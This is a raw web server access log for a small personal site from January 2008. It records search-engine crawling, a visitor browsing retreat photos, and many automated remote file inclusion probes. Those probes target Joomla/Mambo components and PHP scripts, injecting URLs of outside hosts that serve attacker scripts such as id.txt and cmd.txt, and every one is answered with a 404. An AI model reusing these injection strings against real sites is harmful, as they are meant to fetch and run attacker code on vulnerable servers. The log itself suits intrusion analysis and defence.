219.93.191.226 - - [02/Jan/2008:11:26:43 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ecology.brave.freealoja.com.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.93.191.226 - - [02/Jan/2008:11:26:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ecology.brave.freealoja.com.pt/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.84.57 - - [02/Jan/2008:11:27:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.84.57 - - [02/Jan/2008:11:27:16 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.84.57 - - [02/Jan/2008:11:27:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.156 - - [02/Jan/2008:11:28:16 -0800] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:11:33:32 -0800] "GET /modifyform.html?code=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:11:33:33 -0800] "GET /modifyform.html?code=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.163 - - [02/Jan/2008:11:34:11 -0800] "GET /logs/access_071223.log HTTP/1.0" 200 97760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:11:41:28 -0800] "GET /logs/index2.php?mosConfig_absolute_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:11:41:28 -0800] "GET /index2.php?mosConfig_absolute_pathhttp://page.dark-gfx.de/bw_btown/gallery//includes/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
83.97.101.2 - - [02/Jan/2008:11:44:43 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.97.101.2 - - [02/Jan/2008:11:44:43 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.97.101.2 - - [02/Jan/2008:11:44:44 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.97.101.2 - - [02/Jan/2008:11:44:57 -0800] "GET /logs/access_071220.log/tools/send_reminders.php?noSet=0&includedir=http://blueislandestates.com/Pics/mlr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:11:53:13 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:11:53:48 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.71.89.170 - - [02/Jan/2008:11:56:19 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.80 - - [02/Jan/2008:11:57:58 -0800] "GET /logs/access_071020.log HTTP/1.0" 200 15561 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.110.147.54 - - [02/Jan/2008:11:58:33 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.163 - - [02/Jan/2008:12:03:32 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
74.6.22.82 - - [02/Jan/2008:12:04:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.82 - - [02/Jan/2008:12:04:46 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.28.11 - - [02/Jan/2008:12:05:18 -0800] "GET /megumi/Necklace/ HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.15.104.155 - - [02/Jan/2008:12:06:34 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.35.179 - - [02/Jan/2008:12:06:45 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:06:59 -0800] "GET /retreat1 HTTP/1.1" 301 93 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:06:59 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:06:59 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:07:09 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.1" 200 2701196 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
89.110.147.54 - - [02/Jan/2008:12:07:16 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.147.54 - - [02/Jan/2008:12:07:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:07:26 -0800] "GET /retreat1/IMG_2675.JPG HTTP/1.1" 200 2611496 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:07:38 -0800] "GET /retreat1/IMG_2680.JPG HTTP/1.1" 200 2568348 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:07:51 -0800] "GET /retreat1/IMG_2685.JPG HTTP/1.1" 200 3438622 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:08:09 -0800] "GET /retreat1/IMG_2690.JPG HTTP/1.1" 200 1955508 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:08:25 -0800] "GET /retreat1/IMG_2700.JPG HTTP/1.1" 200 2633978 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:08:38 -0800] "GET /retreat1/IMG_2705.JPG HTTP/1.1" 200 2754218 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:08:50 -0800] "GET /retreat1/IMG_2710.JPG HTTP/1.1" 200 2464822 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:09:05 -0800] "GET /retreat1/IMG_2715.JPG HTTP/1.1" 200 2439082 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:09:20 -0800] "GET /retreat1/IMG_2720.JPG HTTP/1.1" 200 2875898 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:09:32 -0800] "GET /retreat1/IMG_2725.JPG HTTP/1.1" 200 2839528 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:09:44 -0800] "GET /retreat1/IMG_2730.JPG HTTP/1.1" 200 2966608 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:10:07 -0800] "GET /retreat1/IMG_2729.JPG HTTP/1.1" 200 4086258 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:10:34 -0800] "GET /retreat1/IMG_2728.JPG HTTP/1.1" 200 3442484 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
193.43.36.234 - - [02/Jan/2008:12:10:45 -0800] "GET /index.php?option=com_unregister&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
193.43.36.234 - - [02/Jan/2008:12:10:49 -0800] "GET /logs/index.php?option=com_unregister&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.61.30.100 - - [02/Jan/2008:12:11:43 -0800] "GET /index.php?option=com_unregister&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
69.61.30.100 - - [02/Jan/2008:12:11:43 -0800] "GET /logs/index.php?option=com_unregister&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
78.108.81.21 - - [02/Jan/2008:12:14:14 -0800] "GET /index1.php?site=http://www.turnkey-innovations.net/allinone/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
78.108.81.21 - - [02/Jan/2008:12:14:14 -0800] "GET /logs/index1.php?site=http://www.turnkey-innovations.net/allinone/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
68.15.104.155 - - [02/Jan/2008:12:14:57 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.15.104.155 - - [02/Jan/2008:12:14:57 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:12:21:18 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:12:21:19 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.134.215 - - [02/Jan/2008:12:21:19 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [02/Jan/2008:12:22:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.218.192 - - [02/Jan/2008:12:22:49 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://cocc0z.helloweb.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.75.218.192 - - [02/Jan/2008:12:22:56 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://cocc0z.helloweb.eu/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
208.71.89.170 - - [02/Jan/2008:12:24:00 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [02/Jan/2008:12:24:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.19 - - [02/Jan/2008:12:25:04 -0800] "GET /tmp/ HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.27.108 - - [02/Jan/2008:12:29:48 -0800] "GET /tmp/sess_8199a92cf7cb5082699a1dc0794f27d3 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.11.122.72 - - [02/Jan/2008:12:31:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
66.11.122.72 - - [02/Jan/2008:12:31:20 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:32:22 -0800] "GET /retreat1 HTTP/1.1" 301 93 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:32:23 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:32:23 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:32:31 -0800] "GET /retreat1/IMG_2670.JPG HTTP/1.1" 200 2701196 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:32:40 -0800] "GET /retreat1/IMG_2680.JPG HTTP/1.1" 200 2568348 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:32:48 -0800] "GET /retreat1/IMG_2690.JPG HTTP/1.1" 200 1955508 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:33:00 -0800] "GET /retreat1/IMG_2714.JPG HTTP/1.1" 200 2335940 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:33:10 -0800] "GET /retreat1/IMG_2748.JPG HTTP/1.1" 200 2699022 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:33:22 -0800] "GET /retreat1/IMG_2774.JPG HTTP/1.1" 200 2825576 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:33:50 -0800] "GET /retreat1/IMG_2700.JPG HTTP/1.1" 200 2633978 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:33:59 -0800] "GET /retreat1/IMG_2686.JPG HTTP/1.1" 200 3521922 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
74.6.23.227 - - [02/Jan/2008:12:34:03 -0800] "GET /tmp/?S=A HTTP/1.0" 200 1319 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
76.176.14.234 - - [02/Jan/2008:12:34:08 -0800] "GET /retreat1/IMG_2684.JPG HTTP/1.1" 200 2926102 "http://www.dmulk.com/retreat1/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:12:35:18 -0800] "GET /protection.php?action=logout&siteurl=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.145 - - [02/Jan/2008:12:37:00 -0800] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.43.36.234 - - [02/Jan/2008:12:38:06 -0800] "GET /index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
193.43.36.234 - - [02/Jan/2008:12:38:10 -0800] "GET /logs/index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:12:38:25 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:12:38:26 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:12:38:27 -0800] "GET /config.php?path_to_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:12:38:27 -0800] "GET /logs/config.php?path_to_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.71.89.170 - - [02/Jan/2008:12:39:05 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [02/Jan/2008:12:39:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/al.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.30.100 - - [02/Jan/2008:12:39:13 -0800] "GET /index.php?option=com_wysiwygpro3&Itemid=&mosConfig_absolute_path=http://arnoldo.info/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:12:39:39 -0800] "GET /logs/access_071031.log/protection.php?action=logout&siteurl=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:12:39:39 -0800] "GET /logs/protection.php?action=logout&siteurl=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:12:40:21 -0800] "GET /logs/access_071219.log/protection.php?action=logout&siteurl=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.39.227 - - [02/Jan/2008:12:42:19 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.39.227 - - [02/Jan/2008:12:42:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.135.39.227 - - [02/Jan/2008:12:42:43 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:12:45:25 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.67.55.94 - - [02/Jan/2008:12:45:25 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:12:47:26 -0800] "GET /logs/scripts.log/tools/send_reminders.php?noSet=0&includedir=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:12:47:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:12:47:26 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.94.145.104 - - [02/Jan/2008:12:54:43 -0800] "GET /logs/access_071222.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [02/Jan/2008:12:54:44 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.145.104 - - [02/Jan/2008:12:54:44 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://gw-gold.net/jpg/pictures/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [02/Jan/2008:13:08:30 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.179.198 - - [02/Jan/2008:13:14:02 -0800] "GET /minamijewelry/html/terms.html HTTP/1.0" 200 13534 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:13:25:00 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
